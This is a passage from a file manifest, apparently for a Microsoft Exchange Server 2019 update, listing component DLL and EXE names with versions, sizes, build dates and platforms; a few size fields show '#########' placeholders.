3-Nov-21| 18:11| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.986.11| 13,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.986.14| 181,112| 3-Nov-21| 20:43| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.986.11| 30,088| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.986.14| 22,416| 3-Nov-21| 19:16| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.986.11| 85,904| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.compliance.dll| 15.2.986.13| 35,208| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.986.13| 37,264| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.986.14| 50,568| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.986.14| 33,160| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.986.14| 1,099,144| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.986.14| 206,216| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.986.14| 210,824| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.compression.dll| 15.2.986.13| 17,296| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.986.14| 37,768| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.986.11| 14,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.986.14| 150,920| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.986.11| 14,208| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.986.14| 53,136| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.986.11| 15,744| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.986.14| 23,440| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.986.14| 54,648| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.986.11| 13,712| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.986.14| 1,847,184| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.986.11| 30,072| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.986.14| 68,496| 3-Nov-21| 19:39| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.986.11| 15,224| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.986.14| 21,392| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.986.13| 25,984| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.986.14| 169,864| 3-Nov-21| 18:31| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.986.14| 330,104| 3-Nov-21| 18:33| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.986.14| 173,944| 3-Nov-21| 18:34| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.986.14| 71,032| 3-Nov-21| 18:33| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.986.11| 203,648| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.context.client.dll| 15.2.986.14| 27,024| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.986.14| 51,576| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.context.core.dll| 15.2.986.14| 51,576| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.986.14| 46,984| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.986.11| 1,093,504| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.986.11| 57,208| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.986.11| 326,536| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.986.14| 3,357,560| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.986.11| 35,704| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.986.14| 17,808| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.986.14| 165,264| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.986.14| 619,408| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.986.14| 7,799,696| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.986.11| 80,248| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.data.dll| 15.2.986.14| 1,966,992| 3-Nov-21| 18:45| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.986.14| 1,631,112| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.986.14| 377,736| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.986.14| 105,360| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.986.14| 15,760| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.986.14| 224,656| 3-Nov-21| 19:17| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.986.14| 186,744| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.986.13| 39,800| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.986.14| 119,160| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.986.13| 968,064| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.986.14| 141,200| 3-Nov-21| 19:17| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.986.14| 769,424| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.986.14| 139,664| 3-Nov-21| 19:16| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.986.14| 56,720| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.986.14| 452,488| 3-Nov-21| 19:06| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.986.14| 32,648| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.986.11| 256,912| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.986.14| #########| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.986.11| 37,752| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.986.13| 655,752| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.986.14| 175,480| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.986.14| 36,216| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.986.11| 14,208| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.986.11| 14,208| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.986.11| 14,712| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.986.14| 72,592| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.986.14| 22,904| 3-Nov-21| 19:03| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.986.13| 1,815,928| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.986.13| 1,815,928| 3-Nov-21| 18:11| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.986.14| 23,952| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.986.14| 546,680| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.986.11| 215,416| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.986.14| 194,424| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.986.14| 146,312| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.986.14| 27,536| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.986.11| 13,704| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.986.14| 49,528| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.986.11| 28,024| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.986.14| 208,784| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.986.11| 88,968| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.986.13| 32,648| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.986.14| 45,944| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.986.14| 18,832| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.986.14| 468,864| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.986.11| 206,224| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.986.14| 36,752| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.986.14| 131,448| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.986.14| 21,896| 3-Nov-21| 19:05| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.986.14| 148,344| 3-Nov-21| 19:08| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.986.14| 220,048| 3-Nov-21| 19:11| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.986.11| 23,944| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.986.14| 97,672| 3-Nov-21| 19:10| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.986.13| 1,266,056| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.986.13| 1,266,056| 3-Nov-21| 18:11| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,519| 3-Nov-21| 18:18| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.986.13| 87,440| 3-Nov-21| 18:13| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,473| 3-Nov-21| 18:18| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.986.11| 52,088| 3-Nov-21| 18:18| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.986.14| 292,216| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.986.14| 72,592| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.986.14| 45,968| 3-Nov-21| 19:21| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.986.14| 218,000| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.986.14| 78,216| 3-Nov-21| 19:26| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.986.14| 35,728| 3-Nov-21| 19:26| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.986.14| 934,800| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.986.14| 336,264| 3-Nov-21| 19:21| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.986.14| 52,624| 3-Nov-21| 19:23| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.986.14| 32,144| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.986.14| 60,816| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.986.14| 854,416| 3-Nov-21| 19:20| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.986.14| 290,680| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.986.14| 39,304| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.986.14| 76,176| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.986.14| 166,792| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.986.14| 1,486,736| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.986.14| 122,256| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.986.14| #########| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.986.14| 263,568| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.986.14| 37,776| 3-Nov-21| 19:32| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.986.14| 186,768| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.986.14| 64,400| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.986.14| 83,848| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.986.14| 63,888| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.986.14| 99,720| 3-Nov-21| 19:40| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.986.14| 144,784| 3-Nov-21| 19:26| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.986.14| 270,216| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.986.11| 15,224| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.986.14| 15,736| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.986.14| 131,960| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.986.14| 254,352| 3-Nov-21| 19:16| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.986.11| 13,192| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.986.14| 37,256| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.986.14| 641,928| 3-Nov-21| 18:34| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.986.14| 37,240| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.986.14| 146,312| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.986.11| 13,176| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.986.14| 596,880| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.986.11| 14,712| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.986.14| 30,072| 3-Nov-21| 21:27| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.986.14| 99,704| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.986.14| 42,376| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.986.14| 40,840| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.986.14| 54,144| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.986.14| 164,232| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.986.14| 58,760| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.986.14| 204,664| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.986.14| 17,784| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.986.14| 30,584| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.986.14| 38,800| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.986.14| 48,520| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.986.14| 180,600| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.986.14| 36,752| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.httprequestfiltering.dll| 15.2.986.14| 28,040| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.986.14| 25,984| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.986.14| 1,868,152| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.986.11| 54,672| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.986.14| 35,720| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.986.11| 35,728| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.986.11| 18,320| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.986.11| 18,320| 3-Nov-21| 18:13| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.986.14| 262,536| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.986.14| 262,536| 3-Nov-21| 19:38| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.986.14| 24,952| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.986.14| 24,952| 3-Nov-21| 19:37| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.986.14| 53,112| 3-Nov-21| 18:23| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.986.14| 216,976| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.986.14| 32,136| 3-Nov-21| 20:07| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.986.14| 282,000| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.986.14| 18,832| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.986.14| 83,832| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.986.11| 15,240| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.986.11| 94,096| 3-Nov-21| 18:14| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.986.14| 1,841,016| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.986.11| 71,552| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.986.14| 175,504| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.986.11| 45,960| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.986.11| 159,616| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.986.11| 51,064| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.986.11| 45,968| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.986.14| 32,120| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.986.11| 100,216| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.986.11| 13,200| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.986.14| 271,224| 3-Nov-21| 20:42| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.986.11| 22,416| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.986.14| 33,656| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.986.11| 18,296| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.986.11| 15,224| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.986.11| 27,512| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.986.14| 30,600| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.986.11| 22,400| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.986.14| 66,440| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.986.13| 29,584| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.986.14| 19,848| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.986.11| 20,344| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.986.14| 19,336| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.986.14| 34,184| 3-Nov-21| 19:03| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.986.11| 103,824| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.986.14| 31,624| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.986.11| 15,736| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.986.14| 20,880| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.986.13| 16,248| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.986.14| 49,032| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.986.14| 44,424| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.986.13| 38,280| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.986.14| #########| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.986.11| 29,048| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.986.11| 21,392| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.986.14| 24,456| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.986.14| 15,232| 3-Nov-21| 19:00| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.986.11| 21,904| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.986.11| 89,480| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.986.11| 20,880| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.986.11| 26,512| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.986.11| 21,392| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.986.11| 28,048| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.986.11| 28,544| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.986.11| 36,240| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.986.11| 16,784| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.986.11| 19,840| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.986.11| 15,248| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.986.11| 17,296| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.986.11| 19,856| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.986.11| 57,208| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.986.11| 17,808| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.986.14| 18,808| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.986.11| 16,272| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.986.11| 17,808| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.986.11| 15,232| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.986.11| 15,248| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.986.11| 52,600| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.986.11| 18,320| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.986.11| 34,184| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.986.14| 17,296| 3-Nov-21| 18:59| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.986.11| 18,832| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.986.11| 43,408| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.986.14| 165,264| 3-Nov-21| 18:28| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.986.14| 54,648| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.986.14| 9,059,704| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.986.14| 33,144| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.986.14| 124,296| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.986.11| 82,824| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.986.11| 14,200| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.986.14| 30,072| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.986.14| 661,392| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.986.14| 63,368| 3-Nov-21| 19:50| x86 